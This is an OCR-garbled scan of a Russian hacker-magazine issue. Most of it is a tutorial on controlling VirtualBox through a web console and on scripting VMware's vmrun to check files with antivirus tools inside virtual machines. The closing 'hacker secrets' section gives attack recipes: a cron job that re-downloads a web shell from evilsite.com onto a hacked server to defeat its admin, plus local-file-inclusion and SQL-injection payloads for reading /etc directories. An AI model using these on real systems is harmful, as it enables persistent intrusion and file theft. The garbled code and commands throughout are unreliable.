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■ ■ СТЕПАН «СТЕР» ИЛЬИН НТТР://ТѴѴІТТЕК.С0М/5ТЕРАН 




РАЗБИРАЕМ С АРІВИРТУАЛКИ 
И ДОБАВЛЯЕМ ЕЙ ВЕБ-ИНТЕРФЕЙС 



НЕ НУЖНО ОБЪЯСНЯТЬ, НЕМ ПОЛЕЗНЫ ВИРТУАЛЬНЫЕ МАШИНЫ. НО ИХ ПОЛЕЗНОСТЬ МОЖНО 
УВЕЛИЧИТЬ, РАЗОБРАВШИСЬ, КАК УПРАВЛЯТЬ ИМИ УДАЛЕННО ИЛИ ВОВСЕ АВТОМАТИЗИ- 
РОВАТЬ ВЫПОЛНЯЕМЫЕ НА НИХ ЗАДАЧИ. ПРЯМО СЕЙЧАС МЫ ПОДНИМЕМ КЛАССНЫЙ ВЕБ- 
ИНТЕРФЕЙС ДЛЯ РАБОТЫ С ВИРТУАЛ НАМИ И НАПИШЕМ СИСТЕМУ, КОТОРАЯ БУДЕТ ПРОВЕ- 
РЯТЬ ПРЕДЛОЖЕННЫЙ ФАЙЛ СРАЗУ НЕСКОЛЬКИМИ АНТИВИРУСАМИ, УСТАНОВЛЕННЫМИ НА 
РАЗНЫХ ВИРТУАЛЬНЫХ МАШИНАХ. 



апускать на винде сомнительныетул- 
зы, скачанные с «хакерских» сайтов, 
кейгены и прочую ерунду, происхо- 
ждение которой под большим вопро- 
сом, сродни добровольной установке 
в системутрояна. Такие файлы я предпочитаю 
запускать исключительно под виртуальными 
машинами. Проблемы возникают, когда до- 
машнего компьютера или хотя бы ноута нет под 
рукой. 

ВЕБ-КОНСОЛЬ ДЛЯ УПРАВЛЕНИЯ 

К счастью, для каждой виртуальной машины 
ѴИиаІВох [ ѵѵѵѵѵѵ.ѵігІиаІЬох.огд ). на котором 
у меня вполне успешно уже год работают 
несколько виртуалок, позволяет назначить 
порт ѴВОР-сервера и работать с ними уда- 
ленно через любой РРО-клиент: например, 
тзізс под виндой или гсіезкіор под линуксом. 



В настройках роутера проброшены два порта: 
один — до виртуалки с виндой и другой — 
для орепЗІІЗЕ. При всей красоте такого под- 
хода очень скоро вскрылись два серьезных 
минуса. Во-первых, во многих сетях и хотспо- 
тах беспощадно режется все, кроме несколь- 
ких стандартных портов, и подключиться по 
ПРО никуда уже не удается. А во-вторых, для 
возможности коннекта виртуальную машину 
приходится держать включенной, потому как 
функций удаленного управления или, ска- 
жем, включения по входящему подключению 
нет. Я уже не говорю о том, чтобы изменить 
параметры виртуальной машины или даже 
создать новую. 

Для всего этого напрашивалось вполне оче- 
видное решение — организовать управление 
через веб, ведь 80 порт открыт практически 
везде. Изобретать велосипед не пришлось: 



5ип некогда позаботилась о пользовате- 
лях, инициировав разработку ѴИиаІВох 
ѴѴеЬ Сопзоіе ( собе.доодІе.сот/рА/ЬохѵѵеЬ ) и 
пустив ее в свободное плавание ОрепВоигсе. 
В результате, сейчас мы можем получить 
качественно написанный веб-демон, на 
котором будет крутиться АОАХ-приложение 
для виртуальной машины. Тут все просто — 
это полная копия графического интерфейса 
виртуальной машины, только отображаемая в 
браузере. Вот тебе наглядный пример, какие 
интерфейсы можно создавать, используя 
всем доступные А^Х-фреймворки ] О и е гу и 
его расширение ійиегі: III. Создание новой 
виртуальной машины, запуск и ее остановка, 
сохранение состояния, изменения параме- 
тров гостевой ОС — все делается так, как 
если бы ты запустил ѴігіиаІВох на своей 
машине. 
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УСТАНАВЛИВАЕМ ѴІРТІ)АІ_ВОХ 
ѴѴЕВС0Ы50І.Е 



Возможность такой оболочки реализована 
через АРІ ѴігІиаІВох'а — систему вызовов, 
позволяющую с помощью различных языков 
манипулировать виртуальными машина- 
ми. Серверные компоненты веб-оболочки 
написаны на Руібоп и используют привязки 
для этого языка. Кстати говоря, ѴігІиаІВох 
Руібоп АРІ в текущий момент входит в состав 
ѴігІиаІВох по умолчанию: до этого момента 
приходилось скачивать ѴігІиаІВох 50К и уста- 
навливать привязки для Руібоп'а вручную. В 
качестве основы для демона разработчиками 
был выбран СЬеггуРу ( ѵѵѵѵѵѵ.сбеггѵрѵ.огд ] как 
легкий и мощный веб-сервер. В результате 
демон (исходник — ѴВохѴѴеЬВгѵ.ру] общается 
с ѴігІиаІВох, используя АРІ, и с клиентом — 
посредством НТТР. Все просто: сервер при- 
нимает запросы от браузера клиента, прове- 
ряет их и выполняет вызов соответствующей 
функции ѴігІиаІВох АРІ. Данные передаются 
с использованием стандарта ^0І\І, который 
очень легко парсится в А^Х-окружении. 
Модуль на Руібоп также регистрирует все 
события внутри ѴігІиаІВох'а (например, изме- 
нения состояния виртуальных машин] и пере- 
дает их для отображения в веб-интерфейсе. 
Посмотрим, как это выглядит на практике. 



УСТАНАВЛИВАЕМ ВЕБ-КОНСОЛЬ 

Поскольку ѴігІиаІВох ѴѴеЬ Сопзоіе написана 
на Руібоп'е, первое, что нужно сделать, — 
установить интерпретатор. Здесь и далее я 
буду описывать процесс для винды, но для 
других ОС все выполняется аналогично. 
Если не ищешь проблем, рекомендую взять 
Руібоп версии 2.6 с рѵібоп.огд/сіоѵѵпіоасі . 
Далее необходимо установить библиотеки 



расширения — так называемые Руібоп ѴѴіп32 
Ехіепзіопз, предварительно скачанные 
для используемой версии интерпретатора 
с репозитория зоигсеІогде.пеі/рго]есІз/ 
рѵѵуіп32/1і1ез . Чтобы дальше все было окей, 
нужно проверить, чтобы путь к интерпрета- 
тору руібоп. ехе был прописан в переменной 
окружении РАТН. 

Следующий шаг — позаботиться о при- 
вязках. Вообще говоря, опцию Руібоп АРІ 
ѴігІиаІВох я выбирал во время установки, 
но... привязка почему-то не установилась 
(хотя файлы скопировались). Поэтому 
сразу объясню, как заинсталлить ее вруч- 
ную. Для этого переходим в директорию с 
ѴігІиаІВох'ом (ргодгат бі 1ез\зи п\ѵіг!:иа ІЬох] , 
находим папку зсІк\іп5ІаІІ и далее выполняем: 

рукбюп ѵЬохарізеСир . ру іпзкаіі 

Еще один важный момент — под ѴѴі псіоѵѵз 
Ѵізіа и ѴѴ7 установку необходимо запускать 
из-под администратора. После этого можно 
было бы считать ее законченной и приступать 
к запуску веб-демона: 

руСЬоп ѴВохШеЬЗгѵ.ру 

Однако открыв в браузере біір:// 
ІосаІбозІ:8080 (официально поддерживается 
Іпіегпеі Ехріоге и Еігеіюх), ты упрешься в 
тупик. Рабочая система запросит имя и 
пароль пользователя, которого мы еще 
банально не создали. Не вопрос! Опять же, 
из-под аккаунта администратора отдаем 
демону команду на создание нового пользо- 
вателя: руібоп ѴВохѴѴеЬЗгѵ.ру абсіизег туизег 
тураззѵѵогсі. 

Теперь, залогинившись в систему, ты уви- 
дишь список виртуальных машин в левой 
панели, точно такой же, как и в самом интер- 
фейсе ѴігІиаІВох. Если потребуется изменить 
порт или интерфейс, на котором нужно при- 
нимать подключения, достаточно указать 
нужные параметры в конфиге ѴВохѴѴеЬ.сопЕ 

[дІоЬаІ ] 

зегѵег . зоскеС_ТюзЦ = "0.0. 0.0" 

зегѵег . зоскеС_рогЦ = 8080 



ЗАПРОС АВТОРИЗАЦИИ ВЕБ-ДЕМОНА 

ѴігІиаІВох \ѴеЬ Сопзоіе 




ёпі« Зоап й'ііогіпаііоя 
Іляшнюе: 

Ршлѵжі: 

ЬсмрГк 
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ВЕБ-ОБОЛОЧКА — ЭТО ПОЛ- 
НАЯ КОПИЯ ОБЫЧНОГО 6Ш- 
ИНТЕРФЕЙСАр НО НААЭАХ 



О том, что в ѴігІиаІВох вот-вот появится под- 
держка плагина на Еіазб, позволяющего 
управлять виртуальными машинами через 
браузер, мне рассказал один из разработчи- 
ков еще во время весенней конференции 5ип 
Тесб Рауз. Правда, в тот момент 5ип ничего 
официально не объявлял, а пощупать все 
руками не вышло даже в самой последней 
бете. Такая возможность появилась с выхо- 
дом ѴігІиаІВох ѴѴеЬ Сопзоіе, которая создава- 
лась именно с целью предоставления доступа 
к ѴРОР-серверу через Еіазб. Разработанная 
технология называется 5ип РРй ѴѴеЬ Сопігоі. 
Последняя версия компонента закачивается 
во время установки веб-консоли, поэтому 
дополнительно настраивать ничего не нужно. 
Просто переходишь во вкладку Сопзоіе, 
нажимаешь кнопку Соппесі, и ты прямо 
в окне браузера получаешь полноценное 
РРО-подключение со всеми его возмож- 
ностями. Только представь: из любой точки 
мира ты можешь открывать страничку веб- 
интерфейса, запускать виртуальную машину 
и работать с ней, как ни в чем не бывало, 
прямо из браузера! Респект разработчикам. 

ОСВАИВАЕМ АРІ 

Пример веб-консоли показывает, насколько 
мощным инструментом является система 
АРІ-вызовов, позволяющая управлять всеми 
аспектами конфигурации и запуска вирту- 
альных машин. Освоив несложные привязки, 
можно вывести использование виртуальных 
машин на новый качественный уровень. В 
отличие отѴМѵѵаге, ты не можешь включить 
автозапуск гостевых систем в момент запуска 
гостевой машины. Но благодаря простенько- 
му скрипту, запуск можно автоматизировать 
и влиять на любые его параметры. Вообще, 
есть несколько вариантов решения задачи, 
но попробуем реализовать это с помощью 
сценария, который будет отдавать команды 
на старт виртуалок с помощью ѴігІиаІВох 
АРІ. Система встроенных вызовов такова, 
что использовать его можно из самых разных 
языков программирования: существуют при- 
вязки (т.е. специальные модули] для Заѵа, 
Руібоп и других языков. У нас уже установле- 
но все, что нужно для работы с Руібоп, поэто- 
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небольшой скрипт для запуска виртуальной 

МАШИНЫ ЧЕРЕЗ АРІ 



УСТАНАВЛИВАЕМ ѴѴШ00ѴѴ5 ХР ПОД 
ѴМѴѴАПЕ 5ЕВѴЕП 



параметров передается сессия, идентификатор вирту- 
альной машины. Поскольку мы позволяем пользователю 
использовать как идентификатор, что неудобно, так и 
имя виртуальной машины, то дополнительно определяем 
функцию тасЬВуИ. Задача функции — по имени вирту- 
альной машины определить ее идентификатор: 




> іпіо 

• Комплект разработ- 
чика для ѴіііиаІВох 
включает в себя при- 
меры на іаѵа, РуіФоп, 
Регі. 

• В случае автомати- 
зированного исполь- 
зования ѴігШаІВох ее 
лучше запускать как 
сервис. Рекомендую 
тебе правильный 
мануал по этому пово- 
ду: іЬМІУМеуібсттѴ 
ѵігІиаІЬох/Ьоѵѵ-Ію-гип- 
ѵігіиаІЬох-аз-гегѵісе- 

ІП-ѴѴІПСІ0ѴѴ5 . 




> СІѴСІ 

На диске ты найдешь 
последние версии 
виртуальных машин, 
а также разработан- 
ные нами скрипты, 
втом числе, исход- 
ники системы для 
автоматизирован- 
ного тестирования 
антивирусов. 



му это хороший вариант для старта. Скажу более — прямо 
с ѴігШаВох'ом идет специальная обертка, в которой 
завуалированы многие кроссплатформенные аспекты, а 
потому написанные с ее помощью скрипты будут работать 
на разных платформах. 

Любой скрипте использованием привязки начинает- 
ся с подключения нужного модуля и создания объекта 

ѵИиаІВохМападеп 

ішрогС ѴігСиаІВохМападег 
ѵігСиаІВохМападег = 

ѴігВиаІВохМападег (Копе , Ыопе) 

Конструктор для создания объекта может принимать 
параметры, но мы их оставим по умолчанию: (ІМопе, 

ІМопе). После создания экземпляра объекта можно 
выполнять разные операции. Например, следующий код 
запустит виртуальную машину по ее имени или идентифи- 
катору (Ю) : 

ѵЬох = ѵігВиаІВохМападег . ѵЬох 
тдг = ѵігСиаІВохМападег .тдг 
ргіпВ "Ѵегзіоп із" , ѵЬох. ѵегзіоп 

пате = "хр епд" 
тасЪ. = тасЪВуІс! (пате) 

іі тасЪ із Ыопе: 

ргіпР "саппоВ ііпсі тасЪіпе" , пате 
еізе : 

зеззіоп = тдг . деРЗеззіопОЬд есС (ѵЬох) 
ргодгезз = ѵЬох . орепКетоВеЗеззіоп ( 
зеззіоп, тасЪ. ісі, "диі " , "") 

ргодгезз . ѵ/аіВРогСотрІеВіоп ( -1 ) 
зеззіоп. сіозе ( ) 

Для запуска виртуальной машины используется функция 
орепПетоіеВезвіопО, при этом в качестве первых двух 



сіеі тасЪВуІсІ ( ісі) : 
тасЪ = Ыопе 

іог т іп ѵігВиаІВохМападег . 
деВАггау (ѵЬох, ' тасЪіпез ' ) : 

і€ т.пате == ісі ог тасЪ.іс! == ісі: 
тасЪ = т 
Ьгеак 

геВигп тасЛ 

Третий параметр, передаваемый функции орепРетоІе- 
ЗеззіопО, может принимать два значения: диі и ѵгбр. В 
первом случае открывается обычное окно виртуальной 
машины, в котором ты можешь работать с гостевой ОС. Во 
втором случае откроется консольное окно и предполага- 
ется, что работать с гостевой ОС ты сможешь, подключив- 
шись к виртуалке по ВРО-протоколу. 

Вот собственно и весь код. Оформив его в виде функции, 
можно повторно использовать код для включения нужно- 
го числа виртуальных машин, что нам как раз и нужно. В 
качестве еще одного примера рекомендую изучить скрипт 
для безболезненного импорта/экспорта виртуальных 
машин [ диі-аЛсепсІаѵѵеЬ.С 2 / 2009 / 09 /ѴВохІЛі[.рѵ ). Без него 
процесс переноса виртуальной машины с одного хоста на 
другой превращается в некислый геморрой. С позиции 
обучения он интересен тем, что использует самые разные 
возможности АРІ. 

ПРОДОЛЖАЕМ ЭКСПЕРИМЕНТЫ 

Вот тебе другая ситуация. Файл необходимо проверить 
несколькими антивирусами. Понятно, что на одной маши- 
не едва ли уживутся даже два антивируса — чего уж гово- 
рить, если их будет, скажем, десять? Верный путь реше- 
ния проблемы — установить каждый антивирус на отдель- 
ную виртуальную машину, но не запускать же каждую с 
последующим сканированием файла вручную? Можно 
взять и написать несложный сценарий, который через 
АРІ запустит виртуальную машину и передаст антивирусу 
файл для проверки. Попробуем с этим разобраться. 

Я был уверен, что в АРІ Ѵігіиа ІВох'а , помимо функций 
для управления виртуальными машинами, найдутся 
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КЛЮЧИ ДЛЯ ЗАПУСКА ѴМРУЫ.ЕХЕ 



вызовы для манипулирования гостевы- 
ми системами. Например, в ѴМѴѴаге есть 
функции РипРгодгатІпбиезІ для запуска 
приложения в гостевой системе и функции 
СоруРіІеРготбиезіТоНоз* для копирования 
файлов между гостевыми и хостовой систе- 
мами. Не найдя аналогов в документации, 
пришлось обратиться к разработчикам 
ѴігШаІВох, которые подтвердили: «такие 
функции пока только в планах» :(. Конечно, 
можно было бы обойтись и без них (напри- 
мер, добавив скрипт для проверки в авто- 
загрузку системы, а файлы для проверки 
передавать через систему ЗЬагесІ РоШегз], 
но отказываться от возможности манипу- 
лировать гостевой системой не хотелось, 
поэтому было принято решение — в качестве 
технологии использовать продукты ѴМѵѵаге. 

К счастью, есть выбор: можно использовать 
платную ѴѴМѵѵаге ѴѴогкзіабоп, с которой мно- 
гие уже знакомы, или же бесплатный ѴМѵѵаге 
Зегѵег. Оба дистрибутива весят под полгига- 
байта, но предоставляют в нашем случае 
равные возможности. Печальная новость 
состоит в том, что управление ѴМѵѵаге Зегѵег, 
начиная с версии 2.0, полностью осущест- 
вляется через веб-интерфейс и, хотя рабо- 
тает он неплохо, нативный 0111-интерфейс 
ѴѴогкзІюбоп использовать-таки удобнее. Но 
что делать... зато всю мощь виртуализации 
ты получаешь бесплатно, и в своих примерах 
я буду использовать именно его. 

Вместе с тяжелым ядром и веб-сервером 
Тотсаі, на котором хостится админка ѴМѵѵаге 
Зегѵег, в систему устанавливается так назы- 
ваемая ѴМѵѵаге ѴІХ — собственная система 
АРІ, позволяющая программировать вир- 
туальные машины и управлять ими, в том 
числе, манипулировать гостевыми ОС во 
время выполнения. В качестве языка про- 
граммирования очень хотелось использовать 
РуіЬоп, но, увы, не вышло. Официальных 
привязок для этого языка компания не выпу- 
скает, а найденные на просторах Сети само- 
делки руѵіх [ зои гсебогде. пе1:/рго]ес1:5/руѵіх ] 
и руѵтѵѵаге ( собе.доодіе.сот/р/рѵѵтѵѵаге і 
давно не обновлялись и заработали бы 
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с новыми версиями ѴМѵѵаге лишь после 
серьезной работы напильником, которой 
заниматься совсем не охота. Описание про- 
екта ѵіхру [ собе.доодіе.сот/р/ѵіхру ]. указыва- 
ющее, что это единственный обновляющийся 
проект, выглядело многообещающе, но все 
попытки найти файлы привязки, скачать их 
из репозитария зѵп или связаться с автором 
не увенчались успехом. 

Впрочем, нашелся еще один проект — оберт- 
ка Руібоп'а для утилиты ѵтгип.ехе, также 
входящей в набор ѴМѵѵаге ѴІХ и позволяю- 
щей как угодно манипулировать системой 
прямо из командной строки. Сама обертка, 
как водится, безнадежно устарела, зато 
открыла для меня ѵтгип.ехе — совершенно 
чумовой консольный инструмент, реализую- 
щий всю мощь ѴМѵѵаге АРІ! Задача у нас 
несложная, а, значит, вполне должно хватить 
ее возможностей. Конечно, при таком поло- 
жении вещей пришлось сразу попрощаться 
с объектной моделью и прочими красивостя- 
ми, но способ построить прототип системы 
быстрее еще нужно поискать. К тому же, для 
большей универсальности и качества кода 
легко можно использовать возможности 
РоѵѵегЗЬеІІ. Впрочем, прежде чем приступать 
к программированию ѴМѵѵаге, нужно занять- 
ся подготовкой самих виртуальных машин и 
установленных антивирусов. 

ТЕСТОВАЯ ЛАБОРАТОРИЯ 

Как мы уже сказали, для каждого авера 
мы создаем по одной виртуальной машине. 
Пускай они будут работать на базе ѴѴіпбоѵѵз 
ХР. Для большей универсальности пред- 
лагаю сразу давать виртуальным машинам 
имена в соответствии с тем антивирусом, 
который на нем установлен: СІатАѴ, N осІ32, 
ЗутапТес, Казрегзку. Автоматизировать 



процесс сканирования через навороченные 
графические интерфейсы — лишнее изо- 
бретение велосипеда, потому как у любого 
вендора есть решение, работающее через 
командную строку. Возьмем для примера 
бесплатный антивирус СІатАѴ, с помощью 
которого и построим одну из виртуальных 
машин для тестирования. Я использовал 
РогІаЫе-версию антивируса [ рогІаЫеаррз. 
сот/а ррз/ибіібез/сіатѵѵіп рогіаЫе ). но это 
непринципиально. 

Чтобы скрипты для работы были более-менее 
универсальны, на каждой виртуальной маши- 
не неплохо будет использовать одинаковую 
систему каталогов. Предлагаю создать папку 
для нашей тестовой лаборатории С:\Х1_аЬ с 

ПРОСТОЙ Структурой: 

С: \ХЬаЬ: 

ОиагапбіпеРіІез — карантин, куда 
будут скачиваться файлы для ана- 
лиза 

ОибрибРіІез — папка для сохранения 
отчетов антивируса, которые далее 
будут передаваться на хостовую 
машину 

Зо^Р — папка с необходимым 
софтом: 

Зо^б\Ѵ7деб — утилита для закачки 
файлов 

ЗоббХСІатМіпРогбаЪГе — наш анти- 
вирус 

Общая идея простая: специальный ВАТ- 
файл сначала запускает консольную качалку 
ѵѵдеі (порт никсовой утилиты], закачивая 
указанный файл в папку-карантин, содер- 
жимое которого затем проверяется анти- 
вирусом. Отчет авера сохраняется в папку 



ХАКЕР 12 /132/ 09 



► 043 





УПРАВЛЯЕМ ГОСТЕВОЙ ѴѴШБ0ѴѴ5 ХР ПРЯМО 
В БРАУЗЕРЕ 



ОіЛриіРіІеБ, откуда мы его забираем на хостовую машину. 

При всей простоте с настройкой антивирусов придется немного 
повозиться. Даже если взять СІатАѴ, для которого изначально пред- 
полагается использование из командной строки. При запуске кон- 
сольной версии программы сіатзсап.ехе упорно выдавалась ошибка 
об отсутствии антивирусных баз, хотя в 6111-версии антивируса все 
было окей. Долго не понимая, какой же ключ используется для обнов- 
ления антивирусных баз, я нашел специально предназначенную для 
этого тулзу, которая лежала рядом — ітезбсіат.ехе. Но и она не запу- 
скалась, ссылаясь на отсутствие конфига! 

ВаСаЬазеБігесЦогу с : /ХЬаЪ/ЗоІС/СІаігМіпРогРаЪІе/Арр/ 
сІапміп/Ъіп 

БаСаЪазеМіггог сІакаЪазе . сіатаѵ . пек 

Эти две строки, сохраненные в ітезЬсІат.соп!, наконец, заставили 
базы обновиться, а сам антивирус заработать. Чтобы указать путь для 
сканирования, пришлось создать текстовый файл Іозсап.М с содер- 
жанием пути до карантина «С:\Х1_аЬ\0иагап1:іпеРіІе5\». В результате 
можно было собрать готовый сІоѴѴогк.ЬаІ, принимающий в качестве 
единственного параметра ШІ- файла для проверки и выполняющий 
сканирование: 

с : 

сіеі /О /Р с : \ХЬаЪ\С>иагапкіпеРі1ез\* . * 

сіеі с : \ХЬаЪ\0икрикРі1ез\герогк . Рхк 

ссі с : \ХЬаЪ\Зо1к\С1атМпРогкаЪ1е\Арр\с1агтміп\Ъіп\ 

1гезЪ.с1ат. ехе 

ссі с : ХХЬаЬХЗоПРХ'МдеСХ 

мдек --сіігесЦогу-ргеПіх=с : \ХЬаЬ\0иагапРіпеРі1ез %1 

ссі с : \ХЬаЪ\ЗоРк\С1атѴАтРогкаЪ1е\Арр\с1атт.п\Ъіп\ 
сіатзсап.ехе --Ті1е-1ізк=коЗсап . РхР --1од=с : \ХЬаЬ\ 
0иРриРРі1ез\герогР . РхР 

Дабы избежать проблем с парсингом ІІРІ_, в момент вызова Ьаі-файла 
его лучше взять в кавычки: сІоѴѴогк. Ьаі "ЫТрТ/сЫ. хакер. гиДезРехе". 
Убедившись, что все работает, приступаем к следующей задаче — 
интеграции виртуалки в наш прототип системы для анализа файлов. 

ТЕСТОВАЯ ЛАБОРАТОРИЯ 

Запустить виртуальную машину через ѵтгип.ехе — проще простого. 
Используется ключ зТагТ и указывается путь до .ѵтх-файла — это 
ХМІ_-ка с описанием виртуальной машины, которую генерирует в 
момент создания виртуалки сама ѴМѵѵаге: 

ѵшгип аиЩі_рагат зкагР " [зкапсіагсі] хр епд/хр епд.ѵтх" 




Обрати внимание на переменную [зТапбагсІ], которая определяет стан- 
дартное хранилище виртуальных машин. Если указать полный путь 
до .ѵтх-файла (скажем, рѴігіиаі тасЫпез\хр епд\хр епд.ѵтх], тулза 
выдаст сообщение об ошибке. Чтобы упростить пример, здесь и далее 
я намерено укоротил строку параметров для запуска ѵтгип, заме- 
нив опции для авторизации переменной аіЛЬ_рагат. Что она собой 
представляет? С помощью ключа -Т определяется продукт, который 
ты используешь — ѴѴогкзіабоп или Зегѵег — причем, в последнем 
случае указывается ІІКІ_ админки, а также логин и пароль для входа в 
хостовую машину (и, соответственно, админку ѴМѵѵаге Зегѵег). Вместо 
аиіЬ_рагат в строке для запуска должно стоять: 

Для ѴМѵѵаге ТДогкзСаСіоп : — Т тлз 

Для ѴМѵѵаге Зегѵег: -Т зегѵег -Ъ. Ыскрз:// 

ІосаІТюзк : 8333/зсІк -и хІаЫодіп -р хІаЬразз ш 

После того, как виртуальная машина запущена, запустим нужное нам 
приложение. Название команды гипРгодгатІпбиезІ: говорит само за 
себя. Составляем строку параметров, указывая логин и пароль для 
пользователя внутри гостевой (!) системы, а также полный путь до 
нашего боѴѴогк.Ьаі-файла. Помимо этого, нужно передать в качестве 
параметра ІІПІ_ файла для проверки. 

ѵтгип аиЩі_рагат -ди хІаЪ -др хІаЪ гипРгодгатІпСиезк 
" [зкапсІагсП хр епд/хр епд.ѵтх" " с : \ХЬаЪ\сіоѴѴогк . как " 

% 1 % 

И тут нас постигает первый облом. После недолгого ковыряния в 
Мануэле оказывается, что для работы этой команды на виртуалке 
должны быть установлены ѴМѵѵаге Тооіз, а в гостевой системе вклю- 
чена гостевая учетка. Один клик мыши — и в виртуалке уже смон- 
тирован виртуальный диск с установщиком. Проверяем еще раз... 
работает! 

Сценарий боѴѴогк.ЬаІ создал отчет в папке с:\ХІ_аЬ\0иІриіРіІе5 — 
осталось его оттуда забрать. Для обмена файлами между хосто- 
вой и виртуальными машинами есть специальные команды 
соруРіІеРготНоБіТобиеБІ: и соруРіІеРготбиеБІГГоНоБІ:. Попробуем: 

ѵтгип аикЬ_рагат -ди хІаЪ -др хІаЪ 

соруРіІеРготСиезкТоНозк " [зкапсіагсі] хр епд/хр епд. 
ѵтпх" " с : \ХЬаЬ\0иЦриСРі1ез\герогР . СхР " " с : \Х1аМприР\ 

герогР . РхР " 

Результат проверки оказывается в папке сАХІаЫприІ: на хостовой 
машине. Проверка окончена — осталось охладить виртуалку, выклю- 
чив ее. Но делать этого мы не будем :]. Ведь на запуск уйдет куча 
времени, к тому же, в некоторых случаях придется заморачиваться 
с авторизацией нужного пользователя в гостевой системе. Поэтому 
вместо того чтобы виртуальную машину выключать, мы ее будем усы- 
плять — с помощью команды зизрепсі: 

ѵтгип аиРЬ_рагат зизрепсі " [зРапсіагсі] хр епд/хр епд. 
ѵтх" 

Теперь добавляем в наш сІоѴѴогк. Ьаі необходимые паузы (чтобы запуск 
программы не начинался до того, как загрузится система], и авто- 
матизированный инструмент для тестирования файла в виртуальной 
машине готов. Не буду приводить здесь полную версию скриптов — 
все вместе ты найдешь на диске. Конечно, это лишь прототип полно- 
ценной системы. Но ничего не стоит добавить еще несколько виртуа- 
лок для других антивирусов и таким образом получать сводный отчет 
по одному и тому же файлу. Тот же файл реально скачивать единожды 
на хостовой машине и передавать на гостевые машины — можно 
делать все, что угодно. Главное, что ты знаешь, как манипулировать 
виртуальными машинами, а остальное уже дело техники. "!" 
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ЗАДАЧА: ИЗБЕЖАТЬ ПОСТОЯННОГО 
УДАЛЕНИЯ ѴѴЕВ-ШЕЛЛА СО ВЗЛОМАН- 
НОГО СЕРВЕРА 



РЕШЕНИЕ: 

При возникновении этой проблемы можно немного усложнить жизнь бдяще- 
му админу, особенно если он не до конца догоняет принципы *піх-архитекту- 
ры. Естественно, при этом мы будем заливать шелл не вручную, а автомати- 
чески. Как? Очень просто — с помощью набора сгоп и команды сгопТаЬ. Как 
гласит моя давняя подруга, ѵѵікіресііа.огд : 



ХАКЕРСКИЕ 

СЕКРЕТЫ 

ПРОСТЫХ 

ВЕЩЕЙ 



Первые пять колонок задают время выполнения (Минута, Час, День, Ме- 
сяц, День недели], в них может находиться число, список чисел, разде- 
ленных запятыми, диапазон чисел, разделенных тире, или символ 
Все остальные символы в строке интерпретируются как выполняемая 
команда с ее параметрами. 

2 . Вероятно, на сервере нет поддержки псевдотерминала, поэтому созда- 
дим временный файл Лтр/стб со следующим содержимым: 

ЗНЕЫ.= /Ъіп/ЪазЪ. 

10*** хѵдеб йббр : / / еѵіізібе . сот/ зЬеІІ . бхб -О /йоте/ 



сгоп — демон-планировщик задач в ІЖІХ-подобных операци- 
онных системах, использующийся для периодического выпол- 
нения заданий в заданное время. 

1. Для начала разберем структуру команды сгопіаб. 

Таблица сгопіаб состоит из 6 колонок, разделяемых пробелами или табуля- 
торами. 



изег/ѵлллл/зйеіі . рйр 

3. Запускаем команду сгопіаб Атр/стб. 

4 . Радуемся, ведь теперь в директории /ѵаг/зрооі/сгоп (может меняться в 
зависимости от системы] будет создан файл с именем пользователя, кото- 
рый будет каждый день, в 00 часов 01 минуту запускать команду ѵѵдеі, для 
скачивания нашего шелла. 




ЗАДАЧА: ПРОСМОТРЕТЬ В УДОБ- 
НОМ ВИДЕ СОДЕРЖИМОЕ ПАПКИ НА 
РРЕЕВ50 ЧЕРЕЗ ИНКЛУД ИЛИ 501- 



РЕШЕНИЕ: 

Ты, наверное, ужезнаешь, что РгееВЗО позволяет читать (при наличии прав, 
конечно] нетолько файлы, но и содержимое самих директорий. Допустим, есть 
локальный инклуд или читалка файлов. Если в параметре указать не файл, а 
директорию, то будет выведен ее листинг. 

1. Предположим, у нас есть локальный инклуд. С его помощью мы можем 
прочитать содержимое любого каталога. Например: 



зібе . сот/бііе . рйр?бі1е= . ./. ./. ./. ./. ./. . /ебс/ 



2 . И даже если мы имеем банальную ЗОЫщесІіоп, багофича РгееВЗО при- 
дет к нам на помощь. Единственный нюанс: в СУБД должны быть права на 
«Т1е_ргіѵ». 



зібе. сот/бііе. рйр?бі1е=-1+ипіоп+зе1есб+1,Е0АВ_РІЕЕ ( ’ / 
ебс/ ’ ) , 3 /* 



3. Почему это происходит, задумываться не будем, ибо это тема для отде- 
льной статьи. Для нас важно, что такая возможность существует. Плохо 
лишь то, что при выводе данных в браузер информация выглядит нечита- 
бельно. К счастью для нас, эту проблему уже решил Зсіріо, написав скрипт, 
который отлично справляется с задачей, выводит файлы, папки и символи- 
ческие ссылки в удобном и приятном глазу виде: 



бог ( $і=0 ; $і<$1п; $і+=2 ) 

{ 

$сигйех=зиЪзбг ( $з , $і , 3 ) ; 

$пехбйех=зийзбг ( $з , $і+4 , 1 ) ; 

іб ( ( $сигйех== 1 040 1 ) апсі ( $пехбйех> ’ 1 * ) апсі 





-.1 



Л истингдиректории через скрипт 

( $пехбйех< ' 8 ' ) ) 

{ 

$роЬ= " <Ьг>" . 1 <Ь> [БІЕ] </Ь> 1 ; 
$пат= ТКЕТЕ; 
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$ і + = 4 ; 

} 

ІС ( ( $сигкех== ' 080 ' ) 

апсі ( $пехБЬех> ' 1 ' ) 
апб ( $пехДЬех< ' 8 ' ) ) 

{ 

$роЬ= ,, <Ьг>" . 1 [ЕІБЕ] 
$паш=ТШЕ ; 



} 



$ і + = 4 ; 



Каквидишь, автор просто оптимизировал выводданных посредством анализа 
посторонних Ьех-кодов. Больше о скрипте ты можешь прочитать по ссылке 
Ыір5:/Логит.апІісІіа1.гиДЬгеасІпаѵ55237-1 -1 0.ЫтІ . Там же находится анало- 
гичный сценарий отоЕЬ’а. Выбирай любой и пользуйся. 




ЗАДАЧА: ЗАК0ДИР0ВАТЬ\РАСК0ДИР0- 
ВАТЬ СТРОКУ ИЛИ ТЕКСТ РАЗЛИЧНЫМИ 
АЛГОРИТМАМИ 



РЕШЕНИЕ: 

Необходимость такого рода манипуляций возникает довольно часто. И 
по самым разным причинам. Будьто работа с базой при МК=0І\І, когда 
требуется перевести названиетаблиц в хеке или чар, или перевод строки 
в Ьазе64, при инклудах. Или банально разобрать, что за файл с кряко- 
зябрами попал втвои хакерские ручки. В общем, область применения 
достаточно широкая, вопросовтакого плана возникает много. 

1. Для решения задачи я пользуюсь отличной прогой «Штирлиц» (автор 
— Всеволод Лукьянин]. К сожалению, оффсайт этой софтины приказал 
долго жить, и разработка, видимо, уже не ведется, но и имеющиеся 
версии обладают серьезным функционалом и работают без багов. Эта 
небольшая программулина (-500 Кб] имеет огромный список алгорит- 
мов, и может не только перевести из одной в другую кодировки, но и 
расшифровать испорченный текст, текст, написанный с использованием 
